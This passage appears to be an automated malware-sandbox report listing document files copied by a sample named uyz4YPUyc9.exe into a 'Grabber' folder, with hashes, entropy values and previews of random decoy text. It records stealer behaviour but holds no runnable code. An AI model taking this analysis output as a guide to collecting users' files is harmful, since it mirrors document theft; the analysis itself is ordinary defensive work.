Preview:	PSAMNLJHZWSQDMAZGNPSQVJPYSFUCTTGDJYZLMXSOOEBVYTMYXCFKBUKVYFFHMXRUCYMSTINQFSWBKGZHWWOXSUHIJJAHELKVUMDNJZMRMZFKOUIQGCNVNZVXKWKRUMIVVNVMXPLQTYNNEISPTFLHCHCESXNGLPJCEUOVDOFSSNZDEVGGWGRIJYDNPIXZZQRIXXGAVNXXGMBNWDRPEIKJPBTWXUETHQXVKVNRJASMGUWQWQPUCAORVUSLGQPHEZAOFOACKQOBETERETOORPNJFKDGTDRHKRKEEAGCTYGGVCLOVTVNKIGBHRQXIREFRVVEMBZIDHIFEIOHPIJYGZWGTQWILPNZTDESONAGSHAQLUAVRKHMFOMOQYJXRVMLCUUJVOTUCVOEBKITXOZUZGZKCYNALMRPHSNXGINUBTOYHFDFQLRSZOZWPZGUFGNQWCZHZIXHOYMIXONKNPROHQRYFNTXULDHBFGYLGFAUXJWMFXTRDTCJKCQRMPSJWGMOUCEGLQWZCNKFEKFEUJJIUNMHRRSZPYMRYVQQYYPMGHHEKAQFKKXELSAQQLSLKKUPFWZCMCMFAINYSBZBCFXHKVLASFVZCXQXXXZLHZDHVGKAFBMUFYPUMCUFVZMLVFPOUFRVLCXBIJNSPUAJZYMLVZAAGXYNUCZCXJWFYMHPNYUZQZEKWRMDNWTUBEAPAAIVGGSWPFGRSUHMUGOYCHHBOMRHKMENUQTICOXQBOTOWXHARDPYNZYJCISYKDDFBREXFJNPUTCEDQXTRWWXEGLPLZBRUZXKHOJYFWTASZSDLWXBSEYMHYXZCADAYDPKFTVEVMYYPXPKGKKZUPTORUPLLMBXPDGYHRPPKYZOAWNEPPXHMTQWXMSQFVUTRDJEQKYSLZXRWAHJVOXMIJIPEMOVSQXZXCXSWRQRFYBFUTICJAAGKRSNWDBSGSEWJUBOEPILXBOYUDRCBRFHNBWDQPKBAZMBFBVNFLUTVKABREBJZU

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Documents\IVHSHTCODI\XQACHMZIHU.xlsx

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.693522326362693
Encrypted:	false
SSDEEP:	24:AYOwn5b+bbufFOUPjYbN1/FTKAGrkJYUZQvhuV:pOwV+bbutOUPj0N1/qkTIhE
MD5:	77EC10F00D9B9E14ECB007C137CF869E
SHA1:	F8B6D94864F593C39D9954BCFAEA4AAE12BFEB9A
SHA-256:	22D0155D015841BFCB00EE1D302110DDC7B01F19EB987C20991FF6B65C4FAB96
SHA-512:	AD432B54D1C4A5D602E721BBA01573FA97F8A71CB3DE4A917260451AAD038A10F13231E3A3FA30713419D8ED98CCD52C0686E62C8A065BF71F19B1CBDD154292
Malicious:	false
Preview:	XQACHMZIHUUJLLWDLKIHTZXFIMTIEGGWQWOGPGDGJCNURBVCJQXVBNPVTOPMNNTTDEGSATMWQVJQFPBRZYSWXFZBRDRTMIPXGPYOBPTBGBRCLKOBPWEQYKSWMRZSUVOUZYXPUNQRYSGIJQYNGSQRYHHJZJUMQJPTACXNBIEDZCTCZFJIXKCYCKIPZNVTFBQBHVQPDZQRVSUVURMXHKEGKOEZEKIBLMVJZUDECREOCIPGSFUCTSCEFBGUVOCNDBATVZGWMVPTZJSFZRHXIRJRCNKGELIWDNZGAMKSBWMWHLFEXGQBOUETVJFOOQXUHVLHCLNPXVMMJAJTHMWAYJLTYJTFGFKQFLSVQPPDXBZGMDPNMFIPCUAIECDYSLACFWPJBZLRMHWQJDDODGYBNCMNPZVZEFOUOYYYZSTZKLXVCNXWPBLBCHTQQEFOILBEJPKRUZJWWDNKGUNAADWZHCOURFFZEJCPBGILFFCNVTANFXLWXQDYJULHEUQGOBNUZUCFIYEITTPKEZQIHPOKWZDMMSUBIQXHUWBBEGGRGQPCKRFMAFMCKBLNPXUXCCXQDHQXPKHVYQWHXEGHICDOZJUCLTBKKZKRKOQAZWXHKAHVKDOFGKTIQHEGCMPYHKLGIDESWNAVASFUCOGCYQQRLWQIWDFFCQYHYHKKPIBOGOKXWOZWCVHKMGTXFXAKYYBZQGZWSMFICJRXGDLJAHPSTMPIAXRZNMJBHJFVZOWDKOKPDQRKIRARJEJMNPCSEWUFHKLELPZWCMWLZTZBFWJTIBXAZBTTJOEGHCLXUZYBYGYULFGJPLUNVJCTDKVUHKFCMCESWXMDLZQKDUWTAECRDBWECXPCHPBCERDAJOGFCHMDGSJLSJJKMJCXPTLKLLKNTYGOHAERGCOCIKXTKCONSVANKBZLAAXCSYEMOBEEWLNTVTKLAAWZXJHAKYJHSMBMGKGYCJVIXFXKLBIIILIGERUIRCZLATCAWQPZDBSCIHXZ

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Documents\JDSOXXXWOA.xlsx

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697659282858546
Encrypted:	false
SSDEEP:	24:PZQpY9CEILBiF4Pm3eR+sEnNgL6nCW2Y+uaPg9N/v6Q:xz9CEILGCCeR+sCaLKT2TuamVD
MD5:	36FF3A29DF5FCCA14A0FF7431E1C2E9B
SHA1:	C9688881A1A294728BA4A8B5FB2F38DA3267AC07
SHA-256:	DE686B6E22DC89FE172C29EA9221415221F214CD895763E255FCF5AAEE38E240
SHA-512:	0861C1F602EEC19A2F41C7F9C56352DB9497F628B3F2ECDDC7B98B5E24559D7012EF45D020786DF67FAC85F485CD2A25941EA894681A6B42D9A6ABFC4B9C95CB
Malicious:	false
Preview:	JDSOXXXWOAHUSVGOCZZUNHSINJUSJQGESAHVTHZWADMWVUHKNKEYECCVOPSPXQMMRTJEEDOFPBKWQBWEDEAWUPPRVCRNLZAVBLNCWBMIYVZJGZUPTHGFKCXKWLTQCZQPVRXBIAVKYLTFXPKNHVWYMOUBOZQSCFNHTCTVVDHABNRSEIRXPGUVHPJRXHDVQOUZEXTQARFRICYOSUBNKEVGHZNSQHPCONVPIVIZKOKBTGHMBCORJUHRCVHLLLCXNSHKGVDKTVXUYWRZZWPFJNOSQIOTEJVJWRKTCWXZJKSTIXEMRZVNIBTWRTYOGNKENDSOGEUFCZHZYBWICCKXGXWKGNSNLJGLSDGHUWALHDWVZRYHCQNPZEFTPXYOSUVIOMEZVNNCZURCXELWTINXUKBZTOMRGIVZNMMHUVBKLGFRKYWMYSEIOMJGQGNNWXSIPRRGCYJLZPQIGVVRGGIWSBFJWNMIHYBTTNYTHUBYODAVVOMBAPZKYFUHGDXYMJBKYURCWOJWNGJWFWIHOYYRBYQMJCLIOPHRDDBMRPUMPYCXXGTMYQECUGCCJYKESOBMCTEIFVVICNMXJDGTYESOWLJHWFEFKDEKUKKLKISTLOTKRYLMZDQERBBALFYUEZMKPDBKAGGQHIKIECDSAGIELZVVCNSIPWEXNQLIRNXWGBYHVMXQAPKLQOTFHYKEIQETFBRRPRYPISBRTYMGEIXTCRSLOVMLKWKAUALATKYYNFIRASLERFJZYJWJDEUVJNQIHTSIBZHXWHXSSQNFOSWYDTKNMLOFKDOECKGKVBAKPFZRKCBMCDGLAABGWBCFMKGJUBIHBWBARNAHHTZKNZZPZAUEJJQIUMHCASBJGILUQKBBCSIQMEOUZCFGTXLDYKUHXCHFZHMBCWHRIOVRKXVQUVLMUKYQZQFGGFYGKWBAJJKGZINILPXFMXXMEKMODDVNAMUZNNTJCUURPRTMODGGFBSVRAIMVMRSDSSUQTQRZMVO

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Documents\PSAMNLJHZW.jpg

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	PSA archive data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698960923923406
Encrypted:	false
SSDEEP:	24:mGnbK2uIv9xuPtDhsIChdpYx5eCmVRCqmDCL4yq/6jv:fpuVKIChHYve9RC2LpEK
MD5:	186B4E00711974F7AF578BD6FF959BBF
SHA1:	642B794D73FB09655FBFF8EDCAAA267634554569
SHA-256:	2505B69640298D08BF2DC435A6D289C1FE7ABB349D2017F63EAD8CD2C94199EF
SHA-512:	DD6260B7AF96C7449D3DB4826888F7EAD8F274F9E170E103D588B0AB00A044B5978544A10F7B3C0C8464B74FD10B087C5671177AC1468D7F172DF4E7644A336E
Malicious:	false
Preview:	PSAMNLJHZWSQDMAZGNPSQVJPYSFUCTTGDJYZLMXSOOEBVYTMYXCFKBUKVYFFHMXRUCYMSTINQFSWBKGZHWWOXSUHIJJAHELKVUMDNJZMRMZFKOUIQGCNVNZVXKWKRUMIVVNVMXPLQTYNNEISPTFLHCHCESXNGLPJCEUOVDOFSSNZDEVGGWGRIJYDNPIXZZQRIXXGAVNXXGMBNWDRPEIKJPBTWXUETHQXVKVNRJASMGUWQWQPUCAORVUSLGQPHEZAOFOACKQOBETERETOORPNJFKDGTDRHKRKEEAGCTYGGVCLOVTVNKIGBHRQXIREFRVVEMBZIDHIFEIOHPIJYGZWGTQWILPNZTDESONAGSHAQLUAVRKHMFOMOQYJXRVMLCUUJVOTUCVOEBKITXOZUZGZKCYNALMRPHSNXGINUBTOYHFDFQLRSZOZWPZGUFGNQWCZHZIXHOYMIXONKNPROHQRYFNTXULDHBFGYLGFAUXJWMFXTRDTCJKCQRMPSJWGMOUCEGLQWZCNKFEKFEUJJIUNMHRRSZPYMRYVQQYYPMGHHEKAQFKKXELSAQQLSLKKUPFWZCMCMFAINYSBZBCFXHKVLASFVZCXQXXXZLHZDHVGKAFBMUFYPUMCUFVZMLVFPOUFRVLCXBIJNSPUAJZYMLVZAAGXYNUCZCXJWFYMHPNYUZQZEKWRMDNWTUBEAPAAIVGGSWPFGRSUHMUGOYCHHBOMRHKMENUQTICOXQBOTOWXHARDPYNZYJCISYKDDFBREXFJNPUTCEDQXTRWWXEGLPLZBRUZXKHOJYFWTASZSDLWXBSEYMHYXZCADAYDPKFTVEVMYYPXPKGKKZUPTORUPLLMBXPDGYHRPPKYZOAWNEPPXHMTQWXMSQFVUTRDJEQKYSLZXRWAHJVOXMIJIPEMOVSQXZXCXSWRQRFYBFUTICJAAGKRSNWDBSGSEWJUBOEPILXBOYUDRCBRFHNBWDQPKBAZMBFBVNFLUTVKABREBJZU

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Documents\TTCBKWZYOC.jpg

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695977454005895
Encrypted:	false
SSDEEP:	24:IKgDohtDK2f+uqKGOxwiMIvu5zzh18OA1z55/4WN7REhSO3nDD:nOohtDXf+uqKGzDIvuklFNWAOTD
MD5:	E0510B4427516C1D89AAD3659D680C3D
SHA1:	1992D34F6239D80EB43BA39F3222BF0785E5D1F4
SHA-256:	556717E86C1DA818B7B934A7C0BE10B602083FE8D175A040EB6C76EF69C6CB0F
SHA-512:	35D1D63E8DB736901E6172ABB7882F592249616D70532964B60F82A773DFD445DD8331A3E89B4F900D6113004163232079C8B35643CB340D55BDD538D64D20C3
Malicious:	false
Preview:	TTCBKWZYOCCZBQCNYNNHXDSUERYXFEQHAUPIPNXOJQUXOZUDZEESDNCWHKQKNDQEYQACGNCNEFJMPDQMTDJPVAEXHHOLCNYTGMJTCVIZRGZKUZAERPNBENDVAICXLLOLWSIEGMSOEYEIDITHTRHSYYBWCBGPBZQXLYXBONVSVHSPKATRJUTIDHHHEWUAPCUXVYKWDFZLJYPWDNHQQXDDTWGQTEITGNUSHUFDEKVXMDOCYWEDDXBIFFPUULVKKNZYXAWHAGTUWPXRWSZRERALKIOBMKWSCSDSTMSQDLNMFPLUOAYUREBXICBNWWZYLJESRGANWCSMIZSLZVXYJTVFMIAKQZGHQEHOJNMLWHGSJYIBNSENALZOLRFLSQDCESQDSWEENRDLRNAFBRWHQROVDJKSJYRUAEAUHKYFMNTTDVOAGXTQQBYBDWSLMUXLJPZIDYAQCVQSGWFERMOEEFHPZYPJLENLUNZDHRSMRZOQNAHMCELDIYOVIKYOGXSSTFKWXDNSJGHNTYJKHFDJRAPKRESQVWZSOVMVHWYUUTUTFHVIEEAJDKECWXBEPNEBJDJGQAKLKIFWVTFCSQJEQQWEZAAEMTKTRFKJHVCMNUEIUYFUJNEPLTNBFNHMJZWFTXXNGAINRCKZQCBHNNGXETNSEMBCQLYZYFSVGAIEZXYSKPOLBNTAPFYTMYNIMCZXQJRBOFEHSZEICWGOGLTRINBITAMJGQEWIBXYHZVOSHMRHTIQZVQIDGRVKRGFJMSPQFABQRKGFILZUCAATIAKKCHSPEJWYJMANQFJPEQKGZTIZMTAUNTSDOXPEWOYUIPDMYGGMKHEAQDMKRKFZTSQLBNRGRUGHNILPIUZEKJSVPCMPFTMLUVIXQACJDBCPRGCSQCZAKBCFXGQSAIAKPMNXEUWBMREPVHWIPXGNLGHEWWLCXYFMSRGLLZCLMZCBNWZILRHRHVYKJTMMBSIYLVPVJRQPZZTQANLXKYMFTAVKNBL

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Documents\UQMPCTZARJ.docx

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695507083990718
Encrypted:	false
SSDEEP:	24:QjvupLA8Rg2zRRjgGt3NjEIPTPpg8xIC5XVTaq8T77pQTI0++41E:QgLA0zR5gGt9jEGTR5zXuCTP7
MD5:	6D88D4A4BC7E23FFF4A04EC2CE2B4DB0
SHA1:	C37511CE25F91B44C9E676521E4292FFDAC7147E
SHA-256:	83DC936A36BAA847BD6781CAC0E35006D015860E605B4C26D237E98D13F1908A
SHA-512:	69D76EE3CD91D6B4017312EFD7AA7E084D77D12A8D755CED06EC5C63E6F65262C70199D59151518E34BD6FF8547814724A9BBC63E34742E63F1887BC2BBB2BC4
Malicious:	false
Preview:	UQMPCTZARJFQTUFASTDSOZFLYRXCRKHVOJHYEKAKSJUWEVRKEEHCHPKWPEGNZIZTDIXUBUAFKBDOCCZIPOHGRBVURECWKRUQUOUYFYIUMHCIFKYDLKRSLRMQSZCCHCQTYCAJBIWSRLGLFHPRYQXSMIWVCULYKJGGGJCNVKWJYGBFHMFJLGDWHEBLVQELUPFAEDLGWLIYRFVOLPSGBOOWXATLCJBFUWTROEMRAMGOVEQKCNJFPARYQODRQVWJREDFQAVFXAXQUOFYBKAVYLFWLISVPMAMBKXYNIIHLYGICEPIHLCYULQSUQZMQKWUNRLOBKCTUXYPCLEGWBFUUBSLTLMIAZTIZRCKCPGPOVEVGCNQALQWJUZEWEADOUEECTWCPQBABNXRHBMDCYFWKNTJULTLPELWGANIENXFHRZEDIRITPFUKUVDJJESKDCFVNLQNVDGTOJWCJOOMJDRVLILHRTYJGMUSKTYLJBJFFGYGHLNSJODHZPIYPTJXFEFSYAIBKVTHVGOHNGUYSJLROXGPTNXNEWDYRXSJKDLQCESKVDPTEPJXQSQOGVLGWSHODSNVEQXEBIBZBQDZCRLBLSLYYTZYPCEUWJBUFRIBPYBIJXURCOFBVAMUHYFLJNDCOVIRXBJWRKSMZCWZGUZGAKJMWNQZHQWDXQHBUSCRBGZJEEYRZKNPKEDMWSRIUSWEVSCEYMGSRPFIWGTSTAGTIZVOURKQAHNNKNZFCYOYDNXQRFUDYBZZQRBAIHULYWRSSDCNGYITPPSJJVESDGBSDCPARCPYYFLZFKGRVGMHERPXKDGRXBVCFAMWFQLPZRHVNCIGTHLJYYNMXFTWOKFUGHHVLMJIAPDXBPZWJQADSYARMTUGFGYSOWKFOWTTHRMVDZYEOBJOMCEBCNXURWARWUVMREPQLASVZYXMGMQSSAZYVJXBROVGKGAVIGJWDLFJTASGHWAVHMWWBTHBBULSSCYTUPRYPVAEMBCREUGEJPA

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Documents\UQMPCTZARJ\IVHSHTCODI.pdf

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698618937757839
Encrypted:	false
SSDEEP:	12:9OLMvdtjB4tfcNebo5q78gbSfmGDWic5xFpIhlBKTRQn3JhWbzXEIx52xoTEAU:9O8jmtfwebolhVWtnwTBrnGXnxgak
MD5:	FBFB8162B9366F7135B54193D54C2094
SHA1:	9F7291EB4E117104EE4215B83F38C18607438B02
SHA-256:	D46DB36041F5428D14E2A23B7BDCD936DCD1AE09C398FC5D095C25679B6052DE
SHA-512:	452193D516D505D9D7067AF0132C414A613EFDC264B5D07DF62B06742CFA704925ACAAD18251916DA2DA8957BA2C161F94BAA9CBCF960CB6EC6ACE3397876B01
Malicious:	false
Preview:	IVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZ

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Documents\UQMPCTZARJ\JDSOXXXWOA.xlsx

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697659282858546
Encrypted:	false
SSDEEP:	24:PZQpY9CEILBiF4Pm3eR+sEnNgL6nCW2Y+uaPg9N/v6Q:xz9CEILGCCeR+sCaLKT2TuamVD
MD5:	36FF3A29DF5FCCA14A0FF7431E1C2E9B
SHA1:	C9688881A1A294728BA4A8B5FB2F38DA3267AC07
SHA-256:	DE686B6E22DC89FE172C29EA9221415221F214CD895763E255FCF5AAEE38E240
SHA-512:	0861C1F602EEC19A2F41C7F9C56352DB9497F628B3F2ECDDC7B98B5E24559D7012EF45D020786DF67FAC85F485CD2A25941EA894681A6B42D9A6ABFC4B9C95CB
Malicious:	false
Preview:	JDSOXXXWOAHUSVGOCZZUNHSINJUSJQGESAHVTHZWADMWVUHKNKEYECCVOPSPXQMMRTJEEDOFPBKWQBWEDEAWUPPRVCRNLZAVBLNCWBMIYVZJGZUPTHGFKCXKWLTQCZQPVRXBIAVKYLTFXPKNHVWYMOUBOZQSCFNHTCTVVDHABNRSEIRXPGUVHPJRXHDVQOUZEXTQARFRICYOSUBNKEVGHZNSQHPCONVPIVIZKOKBTGHMBCORJUHRCVHLLLCXNSHKGVDKTVXUYWRZZWPFJNOSQIOTEJVJWRKTCWXZJKSTIXEMRZVNIBTWRTYOGNKENDSOGEUFCZHZYBWICCKXGXWKGNSNLJGLSDGHUWALHDWVZRYHCQNPZEFTPXYOSUVIOMEZVNNCZURCXELWTINXUKBZTOMRGIVZNMMHUVBKLGFRKYWMYSEIOMJGQGNNWXSIPRRGCYJLZPQIGVVRGGIWSBFJWNMIHYBTTNYTHUBYODAVVOMBAPZKYFUHGDXYMJBKYURCWOJWNGJWFWIHOYYRBYQMJCLIOPHRDDBMRPUMPYCXXGTMYQECUGCCJYKESOBMCTEIFVVICNMXJDGTYESOWLJHWFEFKDEKUKKLKISTLOTKRYLMZDQERBBALFYUEZMKPDBKAGGQHIKIECDSAGIELZVVCNSIPWEXNQLIRNXWGBYHVMXQAPKLQOTFHYKEIQETFBRRPRYPISBRTYMGEIXTCRSLOVMLKWKAUALATKYYNFIRASLERFJZYJWJDEUVJNQIHTSIBZHXWHXSSQNFOSWYDTKNMLOFKDOECKGKVBAKPFZRKCBMCDGLAABGWBCFMKGJUBIHBWBARNAHHTZKNZZPZAUEJJQIUMHCASBJGILUQKBBCSIQMEOUZCFGTXLDYKUHXCHFZHMBCWHRIOVRKXVQUVLMUKYQZQFGGFYGKWBAJJKGZINILPXFMXXMEKMODDVNAMUZNNTJCUURPRTMODGGFBSVRAIMVMRSDSSUQTQRZMVO

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Documents\UQMPCTZARJ\TTCBKWZYOC.jpg

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695977454005895
Encrypted:	false
SSDEEP:	24:IKgDohtDK2f+uqKGOxwiMIvu5zzh18OA1z55/4WN7REhSO3nDD:nOohtDXf+uqKGzDIvuklFNWAOTD
MD5:	E0510B4427516C1D89AAD3659D680C3D
SHA1:	1992D34F6239D80EB43BA39F3222BF0785E5D1F4
SHA-256:	556717E86C1DA818B7B934A7C0BE10B602083FE8D175A040EB6C76EF69C6CB0F
SHA-512:	35D1D63E8DB736901E6172ABB7882F592249616D70532964B60F82A773DFD445DD8331A3E89B4F900D6113004163232079C8B35643CB340D55BDD538D64D20C3
Malicious:	false
Preview:	TTCBKWZYOCCZBQCNYNNHXDSUERYXFEQHAUPIPNXOJQUXOZUDZEESDNCWHKQKNDQEYQACGNCNEFJMPDQMTDJPVAEXHHOLCNYTGMJTCVIZRGZKUZAERPNBENDVAICXLLOLWSIEGMSOEYEIDITHTRHSYYBWCBGPBZQXLYXBONVSVHSPKATRJUTIDHHHEWUAPCUXVYKWDFZLJYPWDNHQQXDDTWGQTEITGNUSHUFDEKVXMDOCYWEDDXBIFFPUULVKKNZYXAWHAGTUWPXRWSZRERALKIOBMKWSCSDSTMSQDLNMFPLUOAYUREBXICBNWWZYLJESRGANWCSMIZSLZVXYJTVFMIAKQZGHQEHOJNMLWHGSJYIBNSENALZOLRFLSQDCESQDSWEENRDLRNAFBRWHQROVDJKSJYRUAEAUHKYFMNTTDVOAGXTQQBYBDWSLMUXLJPZIDYAQCVQSGWFERMOEEFHPZYPJLENLUNZDHRSMRZOQNAHMCELDIYOVIKYOGXSSTFKWXDNSJGHNTYJKHFDJRAPKRESQVWZSOVMVHWYUUTUTFHVIEEAJDKECWXBEPNEBJDJGQAKLKIFWVTFCSQJEQQWEZAAEMTKTRFKJHVCMNUEIUYFUJNEPLTNBFNHMJZWFTXXNGAINRCKZQCBHNNGXETNSEMBCQLYZYFSVGAIEZXYSKPOLBNTAPFYTMYNIMCZXQJRBOFEHSZEICWGOGLTRINBITAMJGQEWIBXYHZVOSHMRHTIQZVQIDGRVKRGFJMSPQFABQRKGFILZUCAATIAKKCHSPEJWYJMANQFJPEQKGZTIZMTAUNTSDOXPEWOYUIPDMYGGMKHEAQDMKRKFZTSQLBNRGRUGHNILPIUZEKJSVPCMPFTMLUVIXQACJDBCPRGCSQCZAKBCFXGQSAIAKPMNXEUWBMREPVHWIPXGNLGHEWWLCXYFMSRGLLZCLMZCBNWZILRHRHVYKJTMMBSIYLVPVJRQPZZTQANLXKYMFTAVKNBL

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Documents\UQMPCTZARJ\UQMPCTZARJ.docx

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695507083990718
Encrypted:	false
SSDEEP:	24:QjvupLA8Rg2zRRjgGt3NjEIPTPpg8xIC5XVTaq8T77pQTI0++41E:QgLA0zR5gGt9jEGTR5zXuCTP7
MD5:	6D88D4A4BC7E23FFF4A04EC2CE2B4DB0
SHA1:	C37511CE25F91B44C9E676521E4292FFDAC7147E
SHA-256:	83DC936A36BAA847BD6781CAC0E35006D015860E605B4C26D237E98D13F1908A
SHA-512:	69D76EE3CD91D6B4017312EFD7AA7E084D77D12A8D755CED06EC5C63E6F65262C70199D59151518E34BD6FF8547814724A9BBC63E34742E63F1887BC2BBB2BC4
Malicious:	false
Preview:	UQMPCTZARJFQTUFASTDSOZFLYRXCRKHVOJHYEKAKSJUWEVRKEEHCHPKWPEGNZIZTDIXUBUAFKBDOCCZIPOHGRBVURECWKRUQUOUYFYIUMHCIFKYDLKRSLRMQSZCCHCQTYCAJBIWSRLGLFHPRYQXSMIWVCULYKJGGGJCNVKWJYGBFHMFJLGDWHEBLVQELUPFAEDLGWLIYRFVOLPSGBOOWXATLCJBFUWTROEMRAMGOVEQKCNJFPARYQODRQVWJREDFQAVFXAXQUOFYBKAVYLFWLISVPMAMBKXYNIIHLYGICEPIHLCYULQSUQZMQKWUNRLOBKCTUXYPCLEGWBFUUBSLTLMIAZTIZRCKCPGPOVEVGCNQALQWJUZEWEADOUEECTWCPQBABNXRHBMDCYFWKNTJULTLPELWGANIENXFHRZEDIRITPFUKUVDJJESKDCFVNLQNVDGTOJWCJOOMJDRVLILHRTYJGMUSKTYLJBJFFGYGHLNSJODHZPIYPTJXFEFSYAIBKVTHVGOHNGUYSJLROXGPTNXNEWDYRXSJKDLQCESKVDPTEPJXQSQOGVLGWSHODSNVEQXEBIBZBQDZCRLBLSLYYTZYPCEUWJBUFRIBPYBIJXURCOFBVAMUHYFLJNDCOVIRXBJWRKSMZCWZGUZGAKJMWNQZHQWDXQHBUSCRBGZJEEYRZKNPKEDMWSRIUSWEVSCEYMGSRPFIWGTSTAGTIZVOURKQAHNNKNZFCYOYDNXQRFUDYBZZQRBAIHULYWRSSDCNGYITPPSJJVESDGBSDCPARCPYYFLZFKGRVGMHERPXKDGRXBVCFAMWFQLPZRHVNCIGTHLJYYNMXFTWOKFUGHHVLMJIAPDXBPZWJQADSYARMTUGFGYSOWKFOWTTHRMVDZYEOBJOMCEBCNXURWARWUVMREPQLASVZYXMGMQSSAZYVJXBROVGKGAVIGJWDLFJTASGHWAVHMWWBTHBBULSSCYTUPRYPVAEMBCREUGEJPA

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Documents\UQMPCTZARJ\XQACHMZIHU.png

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.693522326362693
Encrypted:	false
SSDEEP:	24:AYOwn5b+bbufFOUPjYbN1/FTKAGrkJYUZQvhuV:pOwV+bbutOUPj0N1/qkTIhE
MD5:	77EC10F00D9B9E14ECB007C137CF869E
SHA1:	F8B6D94864F593C39D9954BCFAEA4AAE12BFEB9A
SHA-256:	22D0155D015841BFCB00EE1D302110DDC7B01F19EB987C20991FF6B65C4FAB96
SHA-512:	AD432B54D1C4A5D602E721BBA01573FA97F8A71CB3DE4A917260451AAD038A10F13231E3A3FA30713419D8ED98CCD52C0686E62C8A065BF71F19B1CBDD154292
Malicious:	false
